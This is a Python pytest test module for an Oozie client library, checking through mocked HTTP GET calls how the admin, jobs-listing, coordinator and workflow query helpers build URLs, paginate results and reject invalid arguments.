class TestOozieClientAdmin(object):
    """Admin endpoints: each admin_* helper maps onto one 'admin/...' GET."""

    @pytest.mark.parametrize("function, endpoint", [
        ('admin_status', 'status'),
        ('admin_os_env', 'os-env'),
        ('admin_java_properties', 'java-sys-properties'),
        ('admin_configuration', 'configuration'),
        ('admin_instrumentation', 'instrumentation'),
        ('admin_metrics', 'metrics'),
        ('admin_build_version', 'build-version'),
        ('admin_available_timezones', 'available-timezones'),
        ('admin_queue_dump', 'queue-dump'),
        ('admin_available_oozie_servers', 'available-oozie-servers'),
    ])
    def test_simple_admin(self, function, endpoint, api):
        # Pass-through helpers: method name -> 'admin/<endpoint>' GET.
        with mock.patch.object(api, '_get', return_value=True) as mock_get:
            assert api.__getattribute__(function)()
            mock_get.assert_called_with('admin/' + endpoint)

    def test_admin_list_sharelib(self, api):
        # The sharelib listing is flattened to a plain list of names.
        reply = {
            'sharelib': [
                {'name': 'oozie'},
                {'name': 'hive'},
                {'name': 'distcp'},
                {'name': 'hcatalog'},
                {'name': 'sqoop'},
                {'name': 'mapreduce-streaming'},
                {'name': 'spark'},
                {'name': 'hive2'},
                {'name': 'pig'}
            ]
        }
        expected = ['oozie', 'hive', 'distcp', 'hcatalog', 'sqoop', 'mapreduce-streaming', 'spark', 'hive2', 'pig']
        with mock.patch.object(api, '_get', return_value=reply) as mock_get:
            assert api.admin_list_sharelib() == expected
            mock_get.assert_called_with('admin/list_sharelib')

    def test_admin_list_all_sharelib(self, api):
        # One follow-up '?lib=<name>' GET per library; results keyed by name.
        libs = {
            'admin/list_sharelib?lib=oozie': {'sharelib': [{'files': ['oozie1', 'oozie2'], 'name': 'oozie'}]},
            'admin/list_sharelib?lib=distcp': {'sharelib': [{'files': ['distcp1', 'distcp2'], 'name': 'distcp'}]},
        }
        expected = {
            'oozie': ['oozie1', 'oozie2'],
            'distcp': ['distcp1', 'distcp2'],
        }
        with mock.patch.object(api, 'admin_list_sharelib', return_value=['oozie', 'distcp']):
            with mock.patch.object(api, '_get') as mock_get:
                mock_get.side_effect = lambda endpoint: libs[endpoint]
                result = api.admin_list_all_sharelib()
                assert result == expected
class TestOozieClientJobsQuery(object):
    """Tests for OozieClient._jobs_query() and the jobs_* listing wrappers."""

    def test_jobs_query_workflow_parameters(self, api):
        """user / name / status arguments are encoded into the jobs?filter= query string."""
        mock_result = {
            'total': 0,
            'workflows': []
        }
        with mock.patch.object(api, '_get') as mock_get:
            mock_get.return_value = mock_result
            api._jobs_query(model.ArtifactType.Workflow)
            mock_get.assert_called_with('jobs?jobtype=wf&offset=1&len=5000')
            api._jobs_query(model.ArtifactType.Workflow, user='john_doe')
            mock_get.assert_called_with('jobs?jobtype=wf&filter=user=john_doe&offset=1&len=5000')
            api._jobs_query(model.ArtifactType.Workflow, name='my_workflow')
            mock_get.assert_called_with('jobs?jobtype=wf&filter=name=my_workflow&offset=1&len=5000')
            api._jobs_query(model.ArtifactType.Workflow, status=model.WorkflowStatus.RUNNING)
            mock_get.assert_called_with('jobs?jobtype=wf&filter=status=RUNNING&offset=1&len=5000')
            # A set of statuses becomes a ';'-separated run of status= clauses.
            api._jobs_query(model.ArtifactType.Workflow, status=model.WorkflowStatus.running())
            mock_get.assert_called_with('jobs?jobtype=wf&filter=status=RUNNING;status=SUSPENDED&offset=1&len=5000')
            api._jobs_query(
                model.ArtifactType.Workflow,
                user='john_doe',
                name='my_workflow',
                status=model.WorkflowStatus.running())
            mock_get.assert_called_with('jobs?jobtype=wf&filter=user=john_doe;name=my_workflow;status=RUNNING;'
                                        'status=SUSPENDED&offset=1&len=5000')

    def test_jobs_query_coordinator_parameters(self, api):
        """Coordinator queries use jobtype=coordinator with the same filter encoding."""
        mock_result = {
            'total': 0,
            'coordinatorjobs': []
        }
        with mock.patch.object(api, '_get') as mock_get:
            mock_get.return_value = mock_result
            api._jobs_query(model.ArtifactType.Coordinator)
            mock_get.assert_called_with('jobs?jobtype=coordinator&offset=1&len=5000')
            api._jobs_query(model.ArtifactType.Coordinator, user='john_doe')
            mock_get.assert_called_with('jobs?jobtype=coordinator&filter=user=john_doe&offset=1&len=5000')
            api._jobs_query(model.ArtifactType.Coordinator, name='my_coordinator')
            mock_get.assert_called_with('jobs?jobtype=coordinator&filter=name=my_coordinator&offset=1&len=5000')
            api._jobs_query(model.ArtifactType.Coordinator, status=model.CoordinatorStatus.RUNNING)
            mock_get.assert_called_with('jobs?jobtype=coordinator&filter=status=RUNNING&offset=1&len=5000')
            api._jobs_query(model.ArtifactType.Coordinator, status=model.CoordinatorStatus.running())
            mock_get.assert_called_with('jobs?jobtype=coordinator&filter=status=RUNNING;status=RUNNINGWITHERROR;'
                                        'status=SUSPENDED;status=SUSPENDEDWITHERROR&offset=1&len=5000')
            api._jobs_query(
                model.ArtifactType.Coordinator,
                user='john_doe',
                name='my_coordinator',
                status=model.CoordinatorStatus.running())
            mock_get.assert_called_with('jobs?jobtype=coordinator&filter=user=john_doe;name=my_coordinator;'
                                        'status=RUNNING;status=RUNNINGWITHERROR;status=SUSPENDED;'
                                        'status=SUSPENDEDWITHERROR&offset=1&len=5000')

    def test_jobs_query_bad_parameters(self, api):
        """Action artifact types cannot be listed via the jobs endpoint."""
        with pytest.raises(KeyError) as err:
            api._jobs_query(model.ArtifactType.CoordinatorAction)
        assert 'ArtifactType.CoordinatorAction' in str(err)
        with pytest.raises(KeyError) as err:
            api._jobs_query(model.ArtifactType.WorkflowAction)
        assert 'ArtifactType.WorkflowAction' in str(err)

    @mock.patch.object(model.Workflow, 'fill_in_details', side_effect=lambda c: c, autospec=True)
    def test_jobs_query_workflow_pagination(self, _, api):
        """A total beyond one page triggers a second query at the next offset."""
        mock_results = iter(
            [
                {
                    'total': 5001,
                    'workflows': [{'id': '1-W'}, {'id': '2-W'}]
                },
                {
                    'total': 5001,
                    'workflows': [{'id': '3-W'}]
                }
            ]
        )
        with mock.patch.object(api, '_get') as mock_get:
            mock_get.side_effect = lambda url: next(mock_results)
            result = api._jobs_query(model.ArtifactType.Workflow)
            assert len(result) == 3
            mock_get.assert_any_call('jobs?jobtype=wf&offset=1&len=5000')
            mock_get.assert_any_call('jobs?jobtype=wf&offset=5001&len=5000')
            # Exactly two pages must have been fetched (the iterator is exhausted).
            with pytest.raises(StopIteration):
                next(mock_results)

    @pytest.mark.parametrize('limit, expected_result_count, expected_queries', [
        (0, 3, ['jobs?jobtype=coordinator&offset=1&len=5000', 'jobs?jobtype=coordinator&offset=5001&len=5000']),
        (2, 2, ['jobs?jobtype=coordinator&offset=1&len=2']),
        (6000, 3, ['jobs?jobtype=coordinator&offset=1&len=5000', 'jobs?jobtype=coordinator&offset=5001&len=5000'])
    ])
    @mock.patch.object(model.Coordinator, 'fill_in_details', side_effect=lambda c: c, autospec=True)
    def test_jobs_query_coordinator_pagination(self, _, limit, expected_result_count, expected_queries, api):
        """limit=0 pages through everything; a small limit caps the page size."""
        mock_results = iter(
            [
                {
                    'total': 5001,
                    'coordinatorjobs': [{'coordJobId': '1-C'}, {'coordJobId': '2-C'}]
                },
                {
                    'total': 5001,
                    'coordinatorjobs': [{'coordJobId': '3-C'}]
                }
            ]
        )
        with mock.patch.object(api, '_get') as mock_get:
            mock_get.side_effect = lambda url: next(mock_results)
            result = api._jobs_query(model.ArtifactType.Coordinator, limit=limit)
            assert len(result) == expected_result_count
            mock_get.assert_has_calls(mock.call(query) for query in expected_queries)

    @mock.patch.object(model.Workflow, 'fill_in_details', side_effect=lambda c: c, autospec=True)
    def test_jobs_query_workflow_details(self, fill_in_details, api):
        """details=True triggers fill_in_details on each returned workflow."""
        mock_result = {
            'total': 1,
            'workflows': [{'id': '1-W'}]
        }
        with mock.patch.object(api, '_get') as mock_get:
            mock_get.return_value = mock_result
            api._jobs_query(model.ArtifactType.Workflow, details=False)
            mock_get.assert_called_with('jobs?jobtype=wf&offset=1&len=5000')
            assert not fill_in_details.called
            api._jobs_query(model.ArtifactType.Workflow, details=True)
            mock_get.assert_called_with('jobs?jobtype=wf&offset=1&len=5000')
            assert fill_in_details.called

    @mock.patch.object(model.Coordinator, 'fill_in_details', side_effect=lambda c: c, autospec=True)
    def test_jobs_query_coordinator_details(self, fill_in_details, api):
        """details=True triggers fill_in_details on each returned coordinator."""
        mock_result = {
            'total': 1,
            'coordinatorjobs': [{'coordJobId': '1-C'}]
        }
        with mock.patch.object(api, '_get') as mock_get:
            mock_get.return_value = mock_result
            api._jobs_query(model.ArtifactType.Coordinator, details=False)
            mock_get.assert_called_with('jobs?jobtype=coordinator&offset=1&len=5000')
            assert not fill_in_details.called
            api._jobs_query(model.ArtifactType.Coordinator, details=True)
            mock_get.assert_called_with('jobs?jobtype=coordinator&offset=1&len=5000')
            assert fill_in_details.called

    def test_jobs_all_workflows(self, api, sample_workflow_running):
        """jobs_all_workflows() forwards name / user / limit to _jobs_query()."""
        with mock.patch.object(api, '_jobs_query') as mock_query:
            mock_query.return_value = [sample_workflow_running]
            api.jobs_all_workflows()
            mock_query.assert_called_with(model.ArtifactType.Workflow, name=None, user=None, limit=0)
            api.jobs_all_workflows(name='my_workflow')
            mock_query.assert_called_with(model.ArtifactType.Workflow, name='my_workflow', user=None, limit=0)
            api.jobs_all_workflows(user='john_doe')
            mock_query.assert_called_with(model.ArtifactType.Workflow, name=None, user='john_doe', limit=0)
            api.jobs_all_workflows(name='my_workflow', user='john_doe')
            mock_query.assert_called_with(model.ArtifactType.Workflow, name='my_workflow', user='john_doe', limit=0)
            api.jobs_all_workflows(name='my_workflow', limit=10)
            mock_query.assert_called_with(model.ArtifactType.Workflow, name='my_workflow', user=None, limit=10)

    def test_jobs_all_active_workflows(self, api, sample_workflow_running):
        """jobs_all_active_workflows() queries with the active status set and details."""
        expected_statuses = model.WorkflowStatus.active()
        with mock.patch.object(api, '_jobs_query') as mock_query:
            mock_query.return_value = [sample_workflow_running]
            api.jobs_all_active_workflows()
            mock_query.assert_called_with(
                model.ArtifactType.Workflow, details=True, user=None, status=expected_statuses
            )
            api.jobs_all_active_workflows(user='john_doe')
            mock_query.assert_called_with(
                model.ArtifactType.Workflow, details=True, user='john_doe', status=expected_statuses
            )

    def test_jobs_all_running_workflows(self, api, sample_workflow_running):
        """jobs_all_running_workflows() queries with the running status set and details."""
        expected_statuses = model.WorkflowStatus.running()
        with mock.patch.object(api, '_jobs_query') as mock_query:
            mock_query.return_value = [sample_workflow_running]
            api.jobs_all_running_workflows()
            mock_query.assert_called_with(
                model.ArtifactType.Workflow, details=True, user=None, status=expected_statuses
            )
            api.jobs_all_running_workflows(user='john_doe')
            mock_query.assert_called_with(
                model.ArtifactType.Workflow, details=True, user='john_doe', status=expected_statuses
            )

    def test_jobs_running_workflows(self, api, sample_workflow_running):
        """jobs_running_workflows() filters by name plus the running status set."""
        expected_statuses = model.WorkflowStatus.running()
        with mock.patch.object(api, '_jobs_query') as mock_query:
            mock_query.return_value = [sample_workflow_running]
            api.jobs_running_workflows('my_workflow')
            mock_query.assert_called_with(
                model.ArtifactType.Workflow,
                details=True,
                name='my_workflow',
                user=None,
                status=expected_statuses)
            api.jobs_running_workflows('my_workflow', user='john_doe')
            mock_query.assert_called_with(
                model.ArtifactType.Workflow,
                details=True,
                name='my_workflow',
                user='john_doe',
                status=expected_statuses)

    def test_jobs_last_workflow_parameters(self, api, sample_workflow_running):
        """jobs_last_workflow() asks for a single result (limit=1)."""
        with mock.patch.object(api, '_jobs_query') as mock_query:
            mock_query.return_value = [sample_workflow_running]
            api.jobs_last_workflow('my_workflow')
            mock_query.assert_called_with(model.ArtifactType.Workflow, name='my_workflow', user=None, limit=1)
            api.jobs_last_workflow('my_workflow', user='john_doe')
            mock_query.assert_called_with(model.ArtifactType.Workflow, name='my_workflow', user='john_doe', limit=1)

    def test_jobs_workflow_names_parameters(self, api):
        """jobs_workflow_names() lists workflows without fetching details."""
        with mock.patch.object(api, '_jobs_query') as mock_query:
            mock_query.return_value = []
            api.jobs_workflow_names()
            mock_query.assert_called_with(model.ArtifactType.Workflow, user=None, details=False, limit=0)
            api.jobs_workflow_names(user='john_doe')
            mock_query.assert_called_with(model.ArtifactType.Workflow, user='john_doe', details=False, limit=0)

    def test_jobs_all_coordinators(self, api, sample_coordinator_running):
        """jobs_all_coordinators() always requests details and forwards filters."""
        with mock.patch.object(api, '_jobs_query') as mock_query:
            mock_query.return_value = [sample_coordinator_running]
            api.jobs_all_coordinators()
            mock_query.assert_called_with(
                model.ArtifactType.Coordinator, details=True, name=None, user=None, limit=0
            )
            api.jobs_all_coordinators(name='my_coordinator')
            mock_query.assert_called_with(
                model.ArtifactType.Coordinator, details=True, name='my_coordinator', user=None, limit=0
            )
            api.jobs_all_coordinators(user='john_doe')
            mock_query.assert_called_with(
                model.ArtifactType.Coordinator, details=True, name=None, user='john_doe', limit=0
            )
            api.jobs_all_coordinators(name='my_coordinator', user='john_doe')
            mock_query.assert_called_with(
                model.ArtifactType.Coordinator,
                details=True,
                name='my_coordinator',
                user='john_doe',
                limit=0)
            api.jobs_all_coordinators(name='my_coordinator', limit=1)
            mock_query.assert_called_with(
                model.ArtifactType.Coordinator,
                details=True,
                name='my_coordinator',
                user=None,
                limit=1)

    def test_jobs_all_active_coordinators(self, api, sample_coordinator_running):
        """jobs_all_active_coordinators() queries with the active status set."""
        expected_statuses = model.CoordinatorStatus.active()
        with mock.patch.object(api, '_jobs_query') as mock_query:
            mock_query.return_value = [sample_coordinator_running]
            api.jobs_all_active_coordinators()
            mock_query.assert_called_with(
                model.ArtifactType.Coordinator, details=True, user=None, status=expected_statuses
            )
            api.jobs_all_active_coordinators(user='john_doe')
            mock_query.assert_called_with(
                model.ArtifactType.Coordinator, details=True, user='john_doe', status=expected_statuses
            )

    def test_jobs_all_running_coordinators(self, api, sample_coordinator_running):
        """jobs_all_running_coordinators() queries with the running status set."""
        expected_statuses = model.CoordinatorStatus.running()
        with mock.patch.object(api, '_jobs_query') as mock_query:
            mock_query.return_value = [sample_coordinator_running]
            api.jobs_all_running_coordinators()
            mock_query.assert_called_with(
                model.ArtifactType.Coordinator, details=True, user=None, status=expected_statuses
            )
            api.jobs_all_running_coordinators(user='john_doe')
            mock_query.assert_called_with(
                model.ArtifactType.Coordinator, details=True, user='john_doe', status=expected_statuses
            )

    def test_jobs_all_suspended_coordinators(self, api, sample_coordinator_suspended):
        """jobs_all_suspended_coordinators() queries with the suspended status set."""
        expected_statuses = model.CoordinatorStatus.suspended()
        with mock.patch.object(api, '_jobs_query') as mock_query:
            mock_query.return_value = [sample_coordinator_suspended]
            api.jobs_all_suspended_coordinators()
            mock_query.assert_called_with(model.ArtifactType.Coordinator, user=None, status=expected_statuses)
            api.jobs_all_suspended_coordinators(user='john_doe')
            mock_query.assert_called_with(model.ArtifactType.Coordinator, user='john_doe', status=expected_statuses)

    def test_jobs_running_coordinators(self, api, sample_coordinator_running):
        """jobs_running_coordinators() filters by name plus the running status set."""
        expected_statuses = model.CoordinatorStatus.running()
        with mock.patch.object(api, '_jobs_query') as mock_query:
            mock_query.return_value = [sample_coordinator_running]
            api.jobs_running_coordinators('my_coordinator')
            mock_query.assert_called_with(
                model.ArtifactType.Coordinator,
                name='my_coordinator',
                user=None,
                status=expected_statuses)
            api.jobs_running_coordinators('my_coordinator', user='john_doe')
            mock_query.assert_called_with(
                model.ArtifactType.Coordinator,
                name='my_coordinator',
                user='john_doe',
                status=expected_statuses)

    def test_jobs_last_coordinator_parameters(self, api, sample_coordinator_running):
        """jobs_last_coordinator() asks for a single result (limit=1)."""
        with mock.patch.object(api, '_jobs_query') as mock_query:
            mock_query.return_value = [sample_coordinator_running]
            api.jobs_last_coordinator('my_coordinator')
            mock_query.assert_called_with(model.ArtifactType.Coordinator, name='my_coordinator', user=None, limit=1)
            api.jobs_last_coordinator('my_coordinator', user='john_doe')
            mock_query.assert_called_with(
                model.ArtifactType.Coordinator,
                name='my_coordinator',
                user='john_doe',
                limit=1)

    def test_jobs_coordinator_names_parameters(self, api):
        """jobs_coordinator_names() lists coordinators without fetching details."""
        with mock.patch.object(api, '_jobs_query') as mock_query:
            mock_query.return_value = []
            api.jobs_coordinator_names()
            mock_query.assert_called_with(model.ArtifactType.Coordinator, user=None, details=False)
            api.jobs_coordinator_names(user='john_doe')
            mock_query.assert_called_with(model.ArtifactType.Coordinator, user='john_doe', details=False)
class TestOozieClientJobCoordinatorQuery(object):
    """Tests for coordinator and coordinator-action lookup helpers."""

    def test_coordinator_query_parameters(self, api):
        """Coordinator IDs, action IDs and status filters build the right job/ URLs."""
        mock_coord = {
            'total': 0,
            'coordJobId': SAMPLE_COORD_ID,
            'actions': []
        }
        mock_action = {
            'id': SAMPLE_COORD_ACTION,
        }
        with mock.patch.object(api, '_get') as mock_get:
            def dummy_get(url):
                # Serve the coordinator for job/<id>?... URLs and the action for job/<id>@... URLs.
                if url.startswith('job/' + SAMPLE_COORD_ID + '?'):
                    return mock_coord
                elif url.startswith('job/' + SAMPLE_COORD_ID + '@'):
                    return mock_action
                assert False, 'Unexpected URL'
            mock_get.side_effect = dummy_get
            # Malformed IDs are rejected before any network call.
            with pytest.raises(ValueError) as err:
                api._coordinator_query('foo')
            assert 'Unrecognized job ID' in str(err)
            assert not mock_get.called
            api._coordinator_query(SAMPLE_COORD_ID)
            mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=1&len=1')
            mock_get.reset_mock()
            with pytest.raises(ValueError) as err:
                api._coordinator_query(SAMPLE_COORD_ID + '@foo')
            assert 'Unrecognized job ID' in str(err)
            assert not mock_get.called
            # An action ID fetches the parent coordinator at the action's offset, then the action.
            api._coordinator_query(SAMPLE_COORD_ACTION)
            mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=12&len=1')
            mock_get.assert_any_call('job/' + SAMPLE_COORD_ACTION)
            mock_get.reset_mock()
            api._coordinator_query(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.RUNNING)
            mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=1&len=1&filter=status=RUNNING')
            mock_get.reset_mock()
            api._coordinator_query(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.running())
            mock_get.assert_any_call('job/' + SAMPLE_COORD_ID +
                                     '?offset=1&len=1&filter=status=RUNNING;status=SUSPENDED')
            mock_get.reset_mock()
            with pytest.raises(ValueError) as err:
                api._coordinator_query(SAMPLE_COORD_ACTION, status=model.CoordinatorActionStatus.RUNNING)
            assert 'Cannot supply both coordinator action ID and status' in str(err)
            assert not mock_get.called

    def test_coordinator_query_limits(self, api):
        """start / limit map onto offset / len, clamped to the reported total."""
        mock_result = {
            'total': 100,
            'coordJobId': SAMPLE_COORD_ID,
            'actions': []
        }
        with mock.patch.object(api, '_get') as mock_get:
            mock_get.return_value = mock_result
            with pytest.raises(ValueError) as err:
                api._coordinator_query(SAMPLE_COORD_ACTION, start=1)
            assert 'Cannot supply both coordinator action ID and start / limit' in str(err)
            with pytest.raises(ValueError) as err:
                api._coordinator_query(SAMPLE_COORD_ACTION, limit=10)
            assert 'Cannot supply both coordinator action ID and start / limit' in str(err)
            api._coordinator_query(SAMPLE_COORD_ID)
            mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=1&len=1')
            mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=1&len=100')
            api._coordinator_query(SAMPLE_COORD_ID, start=10)
            mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=10&len=1')
            mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=10&len=91')
            api._coordinator_query(SAMPLE_COORD_ID, limit=10)
            mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?order=desc&offset=1&len=10')
            api._coordinator_query(SAMPLE_COORD_ID, start=10, limit=10)
            mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=10&len=10')
            api._coordinator_query(SAMPLE_COORD_ID, start=99, limit=10)
            mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=99&len=10')
            api._coordinator_query(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.RUNNING, start=10, limit=10)
            mock_get.assert_any_call('job/' + SAMPLE_COORD_ID + '?offset=10&len=10&filter=status=RUNNING')

    def test_coordinator_query_exception(self, api):
        """A transport failure surfaces as 'not found' with the cause chained."""
        with mock.patch.object(api, '_get') as mock_get:
            mock_get.side_effect = exceptions.OozieException.communication_error('A bad thing')
            with pytest.raises(exceptions.OozieException) as err:
                api._coordinator_query(SAMPLE_COORD_ID)
            assert "Coordinator '" + SAMPLE_COORD_ID + "' not found" in str(err)
            assert 'A bad thing' in str(err.value.caused_by)

    def test_coordinator_action_query(self, api):
        """The fetched action is linked back to the supplied coordinator object."""
        mock_result = {
            'id': SAMPLE_COORD_ACTION,
        }
        with mock.patch.object(api, '_get') as mock_get:
            mock_get.return_value = mock_result
            mock_coord = mock.Mock()
            mock_coord.actions = {}
            action = api._coordinator_action_query(SAMPLE_COORD_ID, 12, coordinator=mock_coord)
            mock_get.assert_called_with('job/' + SAMPLE_COORD_ACTION)
            assert action._parent == mock_coord

    def test_coordinator_action_query_exception(self, api):
        """A transport failure surfaces as action 'not found' with the cause chained."""
        with mock.patch.object(api, '_get') as mock_get:
            mock_get.side_effect = exceptions.OozieException.communication_error('A bad thing')
            with pytest.raises(exceptions.OozieException) as err:
                api._coordinator_action_query(SAMPLE_COORD_ID, 12)
            assert "Coordinator action '" + SAMPLE_COORD_ID + "@12' not found" in str(err)
            assert 'A bad thing' in str(err.value.caused_by)

    def test_decode_coord_id(self, api, sample_coordinator_running):
        """Exactly one of coordinator_id / name / coordinator object selects the ID."""
        with mock.patch.object(api, 'jobs_last_coordinator') as mock_last:
            mock_last.return_value = mock.Mock(coordJobId=SAMPLE_COORD_ID)
            with pytest.raises(ValueError) as err:
                api._decode_coord_id()
            assert 'Supply exactly one of coordinator_id or name' in str(err)
            with pytest.raises(ValueError) as err:
                api._decode_coord_id(coordinator_id=SAMPLE_COORD_ID, name='my_coordinator')
            assert 'Supply exactly one of coordinator_id or name' in str(err)
            with pytest.raises(ValueError) as err:
                api._decode_coord_id(coordinator_id=SAMPLE_COORD_ID, user='john_doe')
            assert 'User parameter not supported with coordinator_id' in str(err)
            result = api._decode_coord_id(coordinator_id=SAMPLE_COORD_ID)
            assert result == SAMPLE_COORD_ID
            # A name is resolved through jobs_last_coordinator().
            result = api._decode_coord_id(name='my_coordinator')
            assert result == SAMPLE_COORD_ID
            mock_last.assert_called_with(name='my_coordinator', user=None)
            result = api._decode_coord_id(name='my_coordinator', user='john_doe')
            assert result == SAMPLE_COORD_ID
            mock_last.assert_called_with(name='my_coordinator', user='john_doe')
            mock_last.return_value = None
            with pytest.raises(exceptions.OozieException) as err:
                api._decode_coord_id(name='my_coordinator')
            assert "Coordinator 'my_coordinator' not found" in str(err)
            # A coordinator object supplies its own ID and excludes the other selectors.
            result = api._decode_coord_id(coordinator=sample_coordinator_running)
            assert result == SAMPLE_COORD_ID
            with pytest.raises(ValueError) as err:
                api._decode_coord_id(coordinator_id=SAMPLE_COORD_ID, coordinator=sample_coordinator_running)
            assert 'Supply either a coordinator object or one of coordinator_id or name' in str(err)
            with pytest.raises(ValueError) as err:
                api._decode_coord_id(name='my_coordinator', coordinator=sample_coordinator_running)
            assert 'Supply either a coordinator object or one of coordinator_id or name' in str(err)
            with pytest.raises(ValueError) as err:
                api._decode_coord_id(coordinator=sample_coordinator_running, user='john_doe')
            assert 'User parameter not supported with coordinator object' in str(err)

    def test_job_coordinator_info(self, api):
        """job_coordinator_info() decodes the selector and queries with the given limit."""
        with mock.patch.object(api, '_coordinator_query') as mock_query:
            with mock.patch.object(api, '_decode_coord_id') as mock_decode:
                mock_decode.return_value = SAMPLE_COORD_ID
                api.job_coordinator_info(coordinator_id=SAMPLE_COORD_ID)
                mock_decode.assert_called_with(SAMPLE_COORD_ID, None, None)
                mock_query.assert_called_with(SAMPLE_COORD_ID, limit=0)
                api.job_coordinator_info(name='my_coordinator')
                mock_decode.assert_called_with(None, 'my_coordinator', None)
                mock_query.assert_called_with(SAMPLE_COORD_ID, limit=0)
                api.job_coordinator_info(name='my_coordinator', user='john_doe')
                mock_decode.assert_called_with(None, 'my_coordinator', 'john_doe')
                mock_query.assert_called_with(SAMPLE_COORD_ID, limit=0)
                api.job_coordinator_info(coordinator_id=SAMPLE_COORD_ID, limit=10)
                mock_decode.assert_called_with(SAMPLE_COORD_ID, None, None)
                mock_query.assert_called_with(SAMPLE_COORD_ID, limit=10)

    def test_job_last_coordinator_info(self, api):
        """job_last_coordinator_info() decodes the selector and queries with limit=1."""
        with mock.patch.object(api, '_coordinator_query') as mock_query:
            with mock.patch.object(api, '_decode_coord_id') as mock_decode:
                mock_decode.return_value = SAMPLE_COORD_ID
                api.job_last_coordinator_info(coordinator_id=SAMPLE_COORD_ID)
                mock_decode.assert_called_with(SAMPLE_COORD_ID, None, None)
                mock_query.assert_called_with(SAMPLE_COORD_ID, limit=1)
                api.job_last_coordinator_info(name='my_coordinator')
                mock_decode.assert_called_with(None, 'my_coordinator', None)
                mock_query.assert_called_with(SAMPLE_COORD_ID, limit=1)
                api.job_last_coordinator_info(name='my_coordinator', user='john_doe')
                mock_decode.assert_called_with(None, 'my_coordinator', 'john_doe')
                mock_query.assert_called_with(SAMPLE_COORD_ID, limit=1)

    def test_job_coordinator_action(self, api):
        """Accepts an action ID, or a coordinator ID/name plus an action_number."""
        with mock.patch.object(api, '_coordinator_action_query') as mock_query:
            with mock.patch.object(api, '_decode_coord_id') as mock_decode:
                mock_decode.return_value = SAMPLE_COORD_ID
                api.job_coordinator_action(SAMPLE_COORD_ACTION)
                mock_decode.assert_called_with(SAMPLE_COORD_ACTION, None, None, None)
                mock_query.assert_called_with(SAMPLE_COORD_ID, 12, coordinator=None)
                api.job_coordinator_action(SAMPLE_COORD_ID, action_number=12)
                mock_decode.assert_called_with(SAMPLE_COORD_ID, None, None, None)
                mock_query.assert_called_with(SAMPLE_COORD_ID, 12, coordinator=None)
                api.job_coordinator_action(name='my_coordinator', action_number=12)
                mock_decode.assert_called_with(None, 'my_coordinator', None, None)
                mock_query.assert_called_with(SAMPLE_COORD_ID, 12, coordinator=None)
                api.job_coordinator_action(name='my_coordinator', user='john_doe', action_number=12)
                mock_decode.assert_called_with(None, 'my_coordinator', 'john_doe', None)
                mock_query.assert_called_with(SAMPLE_COORD_ID, 12, coordinator=None)
                with pytest.raises(ValueError) as err:
                    api.job_coordinator_action(SAMPLE_COORD_ACTION, action_number=12)
                assert 'Supply exactly one of coordinator_id or action_number' in str(err)
                with pytest.raises(ValueError) as err:
                    api.job_coordinator_action(name='my_coordinator')
                assert 'No action_number supplied' in str(err)

    def test_job_coordinator_all_active_actions(self, api, sample_coordinator_running,
                                                sample_coordinator_action_running):
        """Queries with the active status set and caches actions on a passed coordinator."""
        with mock.patch.object(api, '_coordinator_query') as mock_query:
            mock_query.return_value = sample_coordinator_action_running.parent()
            with mock.patch.object(api, '_decode_coord_id') as mock_decode:
                mock_decode.return_value = SAMPLE_COORD_ID
                api.job_coordinator_all_active_actions(coordinator_id=SAMPLE_COORD_ID)
                mock_decode.assert_called_with(SAMPLE_COORD_ID, None, None, None)
                mock_query.assert_called_with(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.active())
                api.job_coordinator_all_active_actions(name='my_coordinator')
                mock_decode.assert_called_with(None, 'my_coordinator', None, None)
                mock_query.assert_called_with(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.active())
                api.job_coordinator_all_active_actions(name='my_coordinator', user='john_doe')
                mock_decode.assert_called_with(None, 'my_coordinator', 'john_doe', None)
                mock_query.assert_called_with(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.active())
                # A coordinator object with no cached actions gets them filled in.
                sample_coordinator = copy.copy(sample_coordinator_running)
                sample_coordinator.actions = None
                api.job_coordinator_all_active_actions(coordinator=sample_coordinator)
                mock_decode.assert_called_with(None, None, None, sample_coordinator)
                mock_query.assert_called_with(SAMPLE_COORD_ID, status=model.CoordinatorActionStatus.active())
                assert sample_coordinator.actions
                assert sample_coordinator.actions[12] == sample_coordinator_action_running
class TestOozieClientJobWorkflowQuery(object):
    """Tests for workflow lookup helpers."""

    def test_workflow_query_parameters(self, api):
        """Workflow and workflow-action IDs both resolve to the workflow's job/ URL."""
        mock_result = {
            'total': 0,
            'id': SAMPLE_WF_ID,
            'actions': []
        }
        with mock.patch.object(api, '_get') as mock_get:
            mock_get.return_value = mock_result
            with pytest.raises(ValueError) as err:
                api._workflow_query('foo')
            assert 'Unrecognized job ID' in str(err)
            api._workflow_query(SAMPLE_WF_ID)
            mock_get.assert_called_with('job/' + SAMPLE_WF_ID)
            api._workflow_query(SAMPLE_WF_ACTION)
            mock_get.assert_called_with('job/' + SAMPLE_WF_ID)

    def test_workflow_query_exception(self, api):
        """A transport failure surfaces as 'not found' with the cause chained."""
        with mock.patch.object(api, '_get') as mock_get:
            mock_get.side_effect = exceptions.OozieException.communication_error('A bad thing')
            with pytest.raises(exceptions.OozieException) as err:
                api._workflow_query(SAMPLE_WF_ID)
            assert "Workflow '" + SAMPLE_WF_ID + "' not found" in str(err)
            assert 'A bad thing' in str(err.value.caused_by)

    def test_decode_wf_id(self, api):
        """Exactly one of workflow_id / name selects the workflow ID."""
        with mock.patch.object(api, 'jobs_last_workflow') as mock_last:
            mock_last.return_value = mock.Mock(id=SAMPLE_WF_ID)
            with pytest.raises(ValueError) as err:
                api._decode_wf_id()
            assert 'Supply exactly one of workflow_id or name' in str(err)
            with pytest.raises(ValueError) as err:
                api._decode_wf_id(workflow_id=SAMPLE_WF_ID, name='my_workflow')
            assert 'Supply exactly one of workflow_id or name' in str(err)
